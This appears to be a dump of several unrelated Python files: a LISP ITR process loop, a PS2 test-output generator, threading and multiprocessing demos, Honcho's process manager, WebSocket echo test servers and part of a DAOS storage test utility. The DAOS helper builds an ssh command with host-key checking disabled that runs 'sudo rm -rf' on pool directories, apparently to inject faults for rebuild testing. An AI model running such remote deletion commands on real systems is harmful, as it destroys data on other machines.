rloc_probing_now_on = (rloc_probing == False and lisp.lisp_rloc_probing)
interval = 0
if (rloc_probing_now_on): interval = 1
if (nat_now_on): interval = 5
if (interval != 0):
lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket]
lisp.lisp_start_rloc_probe_timer(interval, lisp_sockets)
#endif
#
# If nat-traversal=yes and data-plane-security=yes on an ITR, then we
# need to set source port in RLOC-probe requrests and encapsulated data
# packets to be the same value.
#
if (lisp.lisp_crypto_ephem_port == None and lisp.lisp_data_plane_security):
port = lisp_ephem_listen_socket.getsockname()[1]
lisp.lisp_crypto_ephem_port = port
lisp.lprint("Use port {} for lisp-crypto packets".format(port))
entry = { "type" : "itr-crypto-port", "port" : port }
lisp.lisp_write_to_dp_socket(entry)
#endif
#
# Write to external data-plane if enabled.
#
lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
lisp.lisp_data_plane_logging)
return
#enddef
#
# lisp_itr_process_nonce_ipc
#
# Process an nonce IPC message from the ETR. It wants to tell us that a
# request-nonce was received and we need to echo it or when this ITR requested
# a nonce to be echoed, the ETR is telling us it has been echoed.
#
def lisp_itr_process_nonce_ipc(ipc):
x, opcode, rloc_str, nonce = ipc.split("%")
nonce = int(nonce, 16)
echo_nonce = lisp.lisp_get_echo_nonce(None, rloc_str)
if (echo_nonce == None): echo_nonce = lisp.lisp_echo_nonce(rloc_str)
#
# If we are in request-nonce mode, exit it, so we can echo the nonce the
# other side is requesting.
#
if (opcode == "R"):
echo_nonce.request_nonce_rcvd = nonce
echo_nonce.last_request_nonce_rcvd = lisp.lisp_get_timestamp()
echo_nonce.echo_nonce_sent = nonce
echo_nonce.last_new_echo_nonce_sent = lisp.lisp_get_timestamp()
lisp.lprint("Start echo-nonce mode for {}, nonce 0x{}".format( \
lisp.red(echo_nonce.rloc_str, False), lisp.lisp_hex_string(nonce)))
#endif
if (opcode == "E"):
echo_nonce.echo_nonce_rcvd = nonce
echo_nonce.last_echo_nonce_rcvd = lisp.lisp_get_timestamp()
if (echo_nonce.request_nonce_sent == nonce):
en = lisp.bold("echoed nonce", False)
lisp.lprint("Received {} {} from {}".format(en,
lisp.lisp_hex_string(nonce),
lisp.red(echo_nonce.rloc_str, False)))
echo_nonce.request_nonce_sent = None
lisp.lprint("Stop request-nonce mode for {}".format( \
lisp.red(echo_nonce.rloc_str, False)))
echo_nonce.last_good_echo_nonce_rcvd = lisp.lisp_get_timestamp()
else:
rns = "none"
if (echo_nonce.request_nonce_sent):
rns = lisp.lisp_hex_string(echo_nonce.request_nonce_sent)
#endif
lisp.lprint(("Received echo-nonce 0x{} from {}, but request-" + \
"nonce is {}").format(lisp.lisp_hex_string(nonce),
lisp.red(echo_nonce.rloc_str, False), rns))
#endif
#endif
return
#enddef
#
# ITR commands procssed by this process.
#
lisp_itr_commands = {
"lisp xtr-parameters" : [lisp_itr_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp interface" : [lispconfig.lisp_interface_command, {
"interface-name" : [True],
"device" : [True],
"instance-id" : [True, 0, 0xffffffff],
"dynamic-eid" : [True],
"multi-tenant-eid" : [True],
"lisp-nat" : [True, "yes", "no"],
"dynamic-eid-device" : [True],
"dynamic-eid-timeout" : [True, 0, 0xff] }],
"lisp map-resolver" : [lisp_itr_map_resolver_command, {
"mr-name" : [True],
"ms-name" : [True],
"dns-name" : [True],
"address" : [True] }],
"lisp map-server" : [lispconfig.lisp_map_server_command, {
"ms-name" : [True],
"address" : [True],
"dns-name" : [True],
"authentication-type" : [False, "sha1", "sha2"],
"authentication-key" : [False],
"encryption-key" : [False],
"proxy-reply" : [False, "yes", "no"],
"want-map-notify" : [False, "yes", "no"],
"merge-registrations" : [False, "yes", "no"],
"refresh-registrations" : [False, "yes", "no"],
"site-id" : [False, 1, 0xffffffffffffffff] }],
"lisp database-mapping" : [lisp_itr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"register-ttl" : [True, 1, 0xffffffff],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"send-map-request" : [True, "yes", "no"],
"subscribe-request" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp itr-map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp geo-coordinates" : [lispconfig.lisp_geo_command, {
"geo-name" : [False],
"geo-tag" : [False] }],
"lisp json" : [lispconfig.lisp_json_command, {
"json-name" : [False],
"json-string" : [False] }],
"show itr-map-cache" : [lisp_itr_show_command, { }],
"show itr-rloc-probing" : [lisp_itr_show_rloc_probe_command, { }],
"show itr-keys" : [lisp_itr_show_keys_command, {}],
"show itr-dynamic-eid" : [lispconfig.lisp_show_dynamic_eid_command, { }]
}
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_itr_startup() == False):
lisp.lprint("lisp_itr_startup() failed")
lisp.lisp_print_banner("ITR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_listen_socket, lisp_ipc_listen_socket,
lisp_ephem_nat_socket, lisp_ipc_punt_socket]
#
# Should we listen to the map-cache/punt IPC socket if it exists.
#
listen_on_ipc_socket = True
ephem_sockets = [lisp_ephem_listen_socket] * 3
ephem_nat_sockets = [lisp_ephem_nat_socket] * 3
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Punt signal message from another data-plane (snabb).
#
if (lisp.lisp_ipc_data_plane and lisp_ipc_punt_socket in ready_list):
lisp.lisp_process_punt(lisp_ipc_punt_socket, lisp_send_sockets,
lisp_ephem_port)
#endif
#
# Process Map-Reply messages received on ephemeral port.
#
if (lisp_ephem_listen_socket in ready_list):
opcode, source, port, packet = lisp.lisp_receive(ephem_sockets[0],
False)
if (source == ""): break
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("ITR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(ephem_sockets, packet, source, port)
#endif
#
# Process Info-Reply messages received on NAT ephemeral port.
#
if (lisp_ephem_nat_socket in ready_list):
opcode, source, port, packet = lisp.lisp_receive(ephem_nat_sockets[0],
False)
if (source == ""): break
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("ITR ignoring RLOC-probe reply, using pcap")
continue
#endif
probe = lisp.lisp_parse_packet(ephem_nat_sockets, packet, source, port)
#
# Info-Reply has new RTR-list, RLOC-probe the RTR RLOCs so we can
# lisp-crypto faster.
#
if (probe):
lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket]
lisp.lisp_start_rloc_probe_timer(0, lisp_sockets)
#endif
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket.
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet == "clear"):
lisp.lisp_clear_map_cache()
continue
#endif
if (packet.find("nonce%") != -1):
lisp_itr_process_nonce_ipc(packet)
continue
#endif
lispconfig.lisp_process_command(lisp_ipc_listen_socket, opcode,
packet, "lisp-itr", [lisp_itr_commands])
elif (opcode == "api"):
lisp.lisp_process_api("lisp-itr", lisp_ipc_listen_socket, packet)
elif (opcode == "data-packet"):
lisp_itr_data_plane(packet, "ipc")
else:
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("ITR ignoring RLOC-probe request, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_itr_shutdown()
lisp.lisp_print_banner("ITR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
gentest.py | import os
import re
import subprocess
import sys
import threading
# Note that PS2HOSTNAME is expected to be set in env.
PS2CLIENT = "ps2client"
MAKE = "make"
TEST_ROOT = "tests/"
TIMEOUT = 10
RECONNECT_TIMEOUT = 10
tests_to_generate = [
"cpu/ee/alu",
"cpu/ee/branch",
"cpu/ee/branchdelay",
]
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
self.output = None
self.timeout = False
self.thread = None
def start(self, capture=True):
def target():
self.process = subprocess.Popen(self.cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
if capture:
self.process.stdin.close()
self.output = ""
while True:
line = self.process.stdout.readline()
self.output += str(line)
if line == "" or line.rstrip() == "-- TEST END":
break
self.finish()
self.thread = threading.Thread(target=target)
self.thread.start()
def stop(self):
if self.thread.is_alive():
self.timeout = True
self.finish()
self.thread.join()
def finish(self):
try:
self.process.terminate()
except WindowsError:
pass
def run(self, timeout):
self.start()
self.thread.join(timeout)
def prepare_test(test, args):
if not ("-k" in args or "--keep" in args):
olddir = os.getcwd()
os.chdir(TEST_ROOT + os.path.dirname(test))
make_target = "all"
if "-r" in args or "--rebuild" in args:
make_target = "rebuild"
make_result = os.system("%s MAKE=\"%s\" %s" % (MAKE, MAKE, make_target))
os.chdir(olddir)
# Don't run the test if make failed, let them fix it.
if make_result > 0:
sys.exit(make_result)
def gen_test(test, args):
elf_path = TEST_ROOT + test + ".elf"
elf_exists = os.path.exists(elf_path);
irx_path = TEST_ROOT + test + ".irx"
irx_exists = os.path.exists(irx_path)
if not elf_exists and not irx_exists:
print("You must compile the test into a ELF first (" + elf_path + ")")
return False
# Seems like the PS2 can hang if it's not reset, let's just always reset for now.
c = Command([PS2CLIENT, "reset"])
c.run(RECONNECT_TIMEOUT)
c.stop()
# Okay, time to run the command.
if elf_exists:
c = Command([PS2CLIENT, "-t", str(TIMEOUT), "execee", "host:" + elf_path] + args)
else:
# For some reason, it says "invalid IOP module" with less than one extra arg.
c = Command([PS2CLIENT, "-t", str(TIMEOUT), "execiop", "host:" + irx_path, "host:" + irx_path] + args)
c.run(TIMEOUT)
output = c.output
if not re.search(r"^-- TEST END\s*$", output, re.MULTILINE):
print(output)
else:
# Strip out debug output from ps2link, etc.
output = re.sub(r"\A[^\Z]+?-- TEST BEGIN", "-- TEST BEGIN", output, re.MULTILINE)
output = re.sub(r"\n-- TEST END\s*\n[^\Z]+\Z", "\n-- TEST END\n", output, re.MULTILINE)
output = re.sub(r"\r\n", "\n", output)
# IOP seems to give an extra pair of \r\ns on Windows.
output = re.sub(r"\r\n", "\n", output)
return output
return False
def gen_test_expected(test, args):
print("Running test " + test + " on the PS2...")
prepare_test(test, args)
result = gen_test(test, args)
expected_path = TEST_ROOT + test + ".expected"
if result != False:
# Normalize line endings on windows to avoid spurious git warnings.
open(expected_path, "wt").write(result)
print("Expected file written: " + expected_path)
return True
return False
def main():
tests = []
args = []
for arg in sys.argv[1:]:
if arg[0] == "-":
args.append(arg)
else:
tests.append(arg.replace("\\", "/"))
if not tests:
tests = tests_to_generate
if "-h" in args or "--help" in args:
print("Usage: %s [options] cpu/ee/alu cpu/ee/branch...\n" % (os.path.basename(sys.argv[0])))
print("Tests should be found under %s and omit the .elf extension." % (TEST_ROOT))
print("Automatically runs make in the test by default.\n")
print("Options:")
print(" -r, --rebuild run make rebuild for each test")
print(" -k, --keep do not run make before tests")
return
for test in tests:
gen_test_expected(test, args)
main()
|
threading_event_0408.py | # -*- coding: utf-8 -*-
# @version : Python3.6
# @Time : 2017/4/8 16:07
# @Author : Jianyang-Hu
# @contact : jianyang1993@163.com
# @File : threading_event_0408.py
# @Software: PyCharm
"""
Event是线程间通信最间的机制之一:一个线程发送一个event信号,
其他的线程则等待这个信号。
用于主线程控制其他线程的执行。
Events 管理一个flag,这个flag可以使用set()设置成True
或者使用clear()重置为False,wait()则用于阻塞,
在flag为True之前。flag默认为False。
Event.wait([timeout]) : 堵塞线程,直到Event对象内部标识位被设为True或超时(如果提供了参数timeout)
Event.set() :将标识位设为Ture
Event.clear() : 将标识伴设为False
Event.isSet() :判断标识位是否为Ture
"""
import threading
def do(event):
print('start')
event.wait()
print('execute')
event_obj = threading.Event()
for i in range(10):
t = threading.Thread(target=do, args=(event_obj,))
t.start()
event_obj.clear()
inp = input('input:')
if inp == 'true':
event_obj.set() |
process.py | from __future__ import print_function
import signal
import subprocess
import sys
import logging
from datetime import datetime
from threading import Thread
from Queue import Queue, Empty
#
# This code comes from Honcho. Didn't need the whole Honcho
# setup, so I just swiped this part which is what the build
# pack utils library needs.
#
# https://github.com/nickstenning/honcho
#
# I've modified parts to fit better with this module.
#
# Copyright (c) 2012 Nick Stenning, http://whiteink.com/
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
def _enqueue_output(proc, queue):
if not proc.quiet:
for line in iter(proc.stdout.readline, b''):
try:
line = line.decode('utf-8')
except UnicodeDecodeError as e:
queue.put((proc, e))
continue
if not line.endswith('\n'):
line += '\n'
queue.put((proc, line))
proc.stdout.close()
class Process(subprocess.Popen):
def __init__(self, cmd, name=None, quiet=False, *args, **kwargs):
self.name = name
self.quiet = quiet
self.reader = None
self.printer = None
self.dead = False
if self.quiet:
self.name = "{0} (quiet)".format(self.name)
defaults = {
'stdout': subprocess.PIPE,
'stderr': subprocess.STDOUT,
'shell': True,
'bufsize': 1,
'close_fds': True
}
defaults.update(kwargs)
super(Process, self).__init__(cmd, *args, **defaults)
class ProcessManager(object):
"""
Here's where the business happens. The ProcessManager multiplexes and
pretty-prints the output from a number of Process objects, typically added
using the add_process() method.
Example:
pm = ProcessManager()
pm.add_process('name', 'ruby server.rb')
pm.add_process('name', 'python worker.py')
pm.loop()
"""
def __init__(self):
self.processes = []
self.queue = Queue()
self.returncode = None
self._terminating = False
self._log = logging.getLogger('process')
def add_process(self, name, cmd, quiet=False):
"""
Add a process to this manager instance:
Arguments:
name - a human-readable identifier for the process
(e.g. 'worker'/'server')
cmd - the command-line used to run the process
(e.g. 'python run.py')
"""
self._log.debug("Adding process [%s] with cmd [%s]", name, cmd)
self.processes.append(Process(cmd, name=name, quiet=quiet))
def loop(self):
"""
Enter the main loop of the program. This will print the multiplexed
output of all the processes in this ProcessManager to sys.stdout, and
will block until all the processes have completed.
If one process terminates, all the others will be terminated
and loop() will return.
Returns: the returncode of the first process to exit, or 130 if
interrupted with Ctrl-C (SIGINT)
"""
self._init_readers()
self._init_printers()
for proc in self.processes:
self._log.info("Started [%s] with pid [%s]", proc.name, proc.pid)
while True:
try:
proc, line = self.queue.get(timeout=0.1)
except Empty:
pass
except KeyboardInterrupt:
self._log.exception("SIGINT received")
self.returncode = 130
self.terminate()
else:
self._print_line(proc, line)
for proc in self.processes:
if not proc.dead and proc.poll() is not None:
self._log.info('process [%s] with pid [%s] terminated',
proc.name, proc.pid)
proc.dead = True
# Set the returncode of the ProcessManager instance if not
# already set.
if self.returncode is None:
self.returncode = proc.returncode
self.terminate()
if not self._process_count() > 0:
break
while True:
try:
proc, line = self.queue.get(timeout=0.1)
except Empty:
break
else:
self._print_line(proc, line)
return self.returncode
def terminate(self):
"""
Terminate all the child processes of this ProcessManager, bringing the
loop() to an end.
"""
if self._terminating:
return False
self._terminating = True
self._log.info("sending SIGTERM to all processes")
for proc in self.processes:
if proc.poll() is None:
self._log.info("sending SIGTERM to pid [%d]", proc.pid)
proc.terminate()
def kill(signum, frame):
# If anything is still alive, SIGKILL it
for proc in self.processes:
if proc.poll() is None:
self._log.info("sending SIGKILL to pid [%d]", proc.pid)
proc.kill()
signal.signal(signal.SIGALRM, kill) # @UndefinedVariable
signal.alarm(5) # @UndefinedVariable
def _process_count(self):
return [p.poll() for p in self.processes].count(None)
def _init_readers(self):
for proc in self.processes:
self._log.debug("Starting [%s]", proc.name)
t = Thread(target=_enqueue_output, args=(proc, self.queue))
t.daemon = True # thread dies with the program
t.start()
def _init_printers(self):
width = max(len(p.name) for p in
filter(lambda x: not x.quiet, self.processes))
for proc in self.processes:
proc.printer = Printer(sys.stdout,
name=proc.name,
width=width)
def _print_line(self, proc, line):
if isinstance(line, UnicodeDecodeError):
self._log.error(
"UnicodeDecodeError while decoding line from process [%s]",
proc.name)
else:
print(line, end='', file=proc.printer)
class Printer(object):
def __init__(self, output=sys.stdout, name='unknown', width=0):
self.output = output
self.name = name
self.width = width
self._write_prefix = True
def write(self, *args, **kwargs):
new_args = []
for arg in args:
lines = arg.split('\n')
lines = [self._prefix() + l if l else l for l in lines]
new_args.append('\n'.join(lines).encode('utf-8'))
self.output.write(*new_args, **kwargs)
def _prefix(self):
time = datetime.now().strftime('%H:%M:%S')
name = self.name.ljust(self.width)
prefix = '{time} {name} | '.format(time=time, name=name)
return prefix
|
autobahn_test_servers.py | # -*- coding: utf-8 -*-
import logging
def run_cherrypy_server(host="127.0.0.1", port=9000):
import cherrypy
from ws4py.server.cherrypyserver import WebSocketPlugin, WebSocketTool
from ws4py.websocket import EchoWebSocket
cherrypy.config.update({'server.socket_host': host,
'server.socket_port': port,
'engine.autoreload_on': False,
'log.screen': False})
WebSocketPlugin(cherrypy.engine).subscribe()
cherrypy.tools.websocket = WebSocketTool()
class Root(object):
@cherrypy.expose
def index(self):
pass
config = {
'/': {
'tools.websocket.on': True,
'tools.websocket.handler_cls': EchoWebSocket
}
}
logger = logging.getLogger('autobahn_testsuite')
logger.warning("Serving CherryPy server on %s:%s" % (host, port))
cherrypy.quickstart(Root(), '/', config)
def run_gevent_server(host="127.0.0.1", port=9001):
from gevent import monkey; monkey.patch_all()
from ws4py.server.geventserver import WebSocketServer
from ws4py.websocket import EchoWebSocket
server = WebSocketServer((host, port), websocket_class=EchoWebSocket)
logger = logging.getLogger('autobahn_testsuite')
logger.warning("Serving gevent server on %s:%s" % (host, port))
server.serve_forever()
def run_tornado_server(host="127.0.0.1", port=9002):
from tornado import ioloop, web, websocket
class EchoWebSocket(websocket.WebSocketHandler):
def on_message(self, message):
self.write_message(message)
app = web.Application([(r"/", EchoWebSocket)])
app.listen(port, address=host)
logger = logging.getLogger('autobahn_testsuite')
logger.warning("Serving Tornado server on %s:%s" % (host, port))
ioloop.IOLoop.instance().start()
def run_autobahn_server(host="127.0.0.1", port=9003):
from autobahntestsuite import choosereactor
import autobahn
from autobahn.websocket import listenWS
from twisted.internet import reactor
from autobahn.websocket import WebSocketServerFactory, \
WebSocketServerProtocol
class ServerProtocol(WebSocketServerProtocol):
def onMessage(self, msg, binary):
self.sendMessage(msg, binary)
class ServerFactory(WebSocketServerFactory):
protocol = ServerProtocol
factory = ServerFactory("ws://%s:%d" % (host, port))
factory.setProtocolOptions(failByDrop=False)
logger.warning("Serving Autobahn server on %s:%s" % (host, port))
listenWS(factory, None)
reactor.run()
if __name__ == '__main__':
import argparse
from multiprocessing import Process
logging.basicConfig(format='%(asctime)s %(message)s')
logger = logging.getLogger('autobahn_testsuite')
logger.setLevel(logging.WARNING)
parser = argparse.ArgumentParser()
parser.add_argument('--run-all', dest='run_all', action='store_true',
help='Run all servers backend')
parser.add_argument('--run-cherrypy-server', dest='run_cherrypy', action='store_true',
help='Run the CheryPy server backend')
parser.add_argument('--run-gevent-server', dest='run_gevent', action='store_true',
help='Run the gevent server backend')
parser.add_argument('--run-tornado-server', dest='run_tornado', action='store_true',
help='Run the Tornado server backend')
parser.add_argument('--run-autobahn-server', dest='run_autobahn', action='store_true',
help='Run the Autobahn server backend')
args = parser.parse_args()
if args.run_all:
args.run_cherrypy = True
args.run_gevent = True
args.run_tornado = True
args.run_autobahn = True
procs = []
logger.warning("CherryPy server: %s" % args.run_cherrypy)
if args.run_cherrypy:
p0 = Process(target=run_cherrypy_server)
p0.daemon = True
procs.append(p0)
logger.warning("Gevent server: %s" % args.run_gevent)
if args.run_gevent:
p1 = Process(target=run_gevent_server)
p1.daemon = True
procs.append(p1)
logger.warning("Tornado server: %s" % args.run_tornado)
if args.run_tornado:
p2 = Process(target=run_tornado_server)
p2.daemon = True
procs.append(p2)
logger.warning("Autobahn server: %s" % args.run_autobahn)
if args.run_autobahn:
p3 = Process(target=run_autobahn_server)
p3.daemon = True
procs.append(p3)
for p in procs:
p.start()
logging.info("Starting process... %d" % p.pid)
for p in procs:
p.join()
|
multiprocessing_import_main.py | #
"""Creating and waiting for a process
"""
# end_pymotw_header
import multiprocessing
import multiprocessing_import_worker
if __name__ == "__main__":
jobs = []
for i in range(5):
p = multiprocessing.Process(target=multiprocessing_import_worker.worker)
jobs.append(p)
p.start()
|
osa_utils.py | #!/usr/bin/python3
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import ctypes
import queue
import time
import threading
import re
from avocado import fail_on
from ior_test_base import IorTestBase
from mdtest_test_base import MdtestBase
from command_utils import CommandFailure
from pydaos.raw import (DaosContainer, IORequest,
DaosObj, DaosApiError)
from general_utils import create_string_buffer, run_command
class OSAUtils(MdtestBase, IorTestBase):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server offline drain test cases.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.pool_cont_dict = {}
self.container = None
self.obj = None
self.ioreq = None
self.dmg_command = self.get_dmg_command()
self.no_of_dkeys = self.params.get("no_of_dkeys", '/run/dkeys/*',
default=[0])[0]
self.no_of_akeys = self.params.get("no_of_akeys", '/run/akeys/*',
default=[0])[0]
self.record_length = self.params.get("length", '/run/record/*',
default=[0])[0]
self.ior_w_flags = self.params.get("write_flags", '/run/ior/iorflags/*',
default="")
self.ior_r_flags = self.params.get("read_flags", '/run/ior/iorflags/*')
self.server_count = len(self.hostlist_servers)
self.engine_count = self.server_managers[0].get_config_value(
"engines_per_host")
self.out_queue = queue.Queue()
self.dmg_command.exit_status_exception = False
self.test_during_aggregation = False
self.test_during_rebuild = False
self.test_with_checksum = True
# By default, test_with_rf is set to False.
# It is up to individual test to enable it.
self.test_with_rf = False
self.test_with_blank_node = False
self.test_with_snapshot = False
@fail_on(CommandFailure)
def get_pool_leader(self):
"""Get the pool leader.
Returns:
int: pool leader value
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return int(data["response"]["leader"])
@fail_on(CommandFailure)
def get_rebuild_status(self):
"""Get the rebuild status.
Returns:
str: rebuild status
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return data["response"]["rebuild"]["status"]
@fail_on(CommandFailure)
def get_rebuild_state(self):
"""Get the rebuild state.
Returns:
str: rebuild state
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return data["response"]["rebuild"]["state"]
@fail_on(CommandFailure)
def is_rebuild_done(self, time_interval,
wait_for_rebuild_to_complete=False):
"""Rebuild is completed/done.
Args:
time_interval: Wait interval between checks
wait_for_rebuild_to_complete: Rebuild completed
(Default: False)
"""
self.pool.wait_for_rebuild(wait_for_rebuild_to_complete,
interval=time_interval)
@fail_on(CommandFailure)
def assert_on_rebuild_failure(self):
"""If the rebuild is not successful,
raise assert.
"""
rebuild_status = self.get_rebuild_status()
self.log.info("Rebuild Status: %s", rebuild_status)
rebuild_failed_string = ["failed", "scanning", "aborted", "busy"]
self.assertTrue(rebuild_status not in rebuild_failed_string,
"Rebuild failed")
@fail_on(CommandFailure)
def print_and_assert_on_rebuild_failure(self, out, timeout=3):
"""Print the out value (daos, dmg, etc) and check for rebuild
completion. If not, raise assert.
"""
self.log.info(out)
self.is_rebuild_done(timeout)
self.assert_on_rebuild_failure()
@fail_on(CommandFailure)
def get_pool_version(self):
"""Get the pool version.
Returns:
int: pool_version_value
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return int(data["response"]["version"])
@fail_on(CommandFailure)
def get_ipaddr_for_rank(self, rank=None):
"""Obtain the IPAddress and port number for a
particular server rank.
Args:
rank (int): daos_engine rank. Defaults to None.
Returns:
ip_addr (str) : IPAddress for the rank.
port_num (str) : Port number for the rank.
"""
output = self.dmg_command.system_query()
members_length = self.server_count * self.engine_count
for i in range(0, members_length):
if rank == int(output["response"]["members"][i]["rank"]):
temp = output["response"]["members"][i]["addr"]
ip_addr = temp.split(":")
temp = output["response"]["members"][i]["fabric_uri"]
port_num = temp.split(":")
return ip_addr[0], port_num[2]
return None, None
@fail_on(CommandFailure)
def remove_pool_dir(self, ip_addr=None, port_num=None):
"""Remove the /mnt/daos[x]/<pool_uuid>/vos-* directory
Args:
ip_addr (str): IP address of the daos server.
Defaults to None.
port_number (str) : Port number the daos server.
"""
# Create the expected port list
# expected_ports = [port0] - Single engine/server
# expected_ports = [port0, port1] - Two engine/server
expected_ports = [engine_param.get_value("fabric_iface_port")
for engine_param in self.server_managers[-1].
manager.job.yaml.engine_params]
self.log.info("Expected ports : %s", expected_ports)
if ip_addr is None or port_num is None:
self.log.info("ip_addr : %s port_number: %s", ip_addr, port_num)
self.fail("No IP Address or Port number provided")
else:
if self.engine_count == 1:
self.log.info("Single Engine per Server")
cmd = "/usr/bin/ssh {} -oStrictHostKeyChecking=no \
sudo rm -rf /mnt/daos/{}/vos-*". \
format(ip_addr, self.pool.uuid)
elif self.engine_count == 2:
if port_num == str(expected_ports[0]):
port_val = 0
elif port_num == str(expected_ports[1]):
port_val = 1
else:
self.log.info("port_number: %s", port_num)
self.fail("Invalid port number")
cmd = "/usr/bin/ssh {} -oStrictHostKeyChecking=no \
sudo rm -rf /mnt/daos{}/{}/vos-*". \
format(ip_addr, port_val, self.pool.uuid)
else:
self.fail("Not supported engine per server configuration")
run_command(cmd)
def set_container(self, container):
"""Set the OSA utils container object.
Args:
container (obj) : Container object to be used
within OSA utils.
"""
self.container = container
def simple_osa_reintegrate_loop(self, rank, action="exclude",
loop_time=100):
"""This method performs exclude or drain and
reintegration on a rank for a certain amount of time.
Args:
rank (int): daos server rank.
action (str) : "exclude" or "drain".
Defaults to "exclude"
loop_time: Total time to perform drain/reintegrate
operation in a loop. (Default : 100 secs)
"""
start_time = 0
finish_time = 0
start_time = time.time()
while int(finish_time - start_time) < loop_time:
if action == "exclude":
output = self.dmg_command.pool_exclude(self.pool.uuid,
rank)
else:
output = self.dmg_command.pool_drain(self.pool.uuid,
rank)
self.print_and_assert_on_rebuild_failure(output)
output = self.dmg_command.pool_reintegrate(self.pool.uuid,
rank)
self.print_and_assert_on_rebuild_failure(output)
finish_time = time.time()
@fail_on(DaosApiError)
def write_single_object(self):
"""Write some data to the existing pool."""
self.pool.connect(2)
csum = self.params.get("enable_checksum", '/run/container/*')
self.container = DaosContainer(self.context)
input_param = self.container.cont_input_values
input_param.enable_chksum = csum
self.container.create(poh=self.pool.pool.handle,
con_prop=input_param)
self.container.open()
self.obj = DaosObj(self.context, self.container)
self.obj.create(objcls=1)
self.obj.open()
self.ioreq = IORequest(self.context,
self.container,
self.obj, objtype=4)
self.log.info("Writing the Single Dataset")
for dkey in range(self.no_of_dkeys):
for akey in range(self.no_of_akeys):
indata = ("{0}".format(str(akey)[0])
* self.record_length)
d_key_value = "dkey {0}".format(dkey)
c_dkey = create_string_buffer(d_key_value)
a_key_value = "akey {0}".format(akey)
c_akey = create_string_buffer(a_key_value)
c_value = create_string_buffer(indata)
c_size = ctypes.c_size_t(ctypes.sizeof(c_value))
self.ioreq.single_insert(c_dkey, c_akey, c_value, c_size)
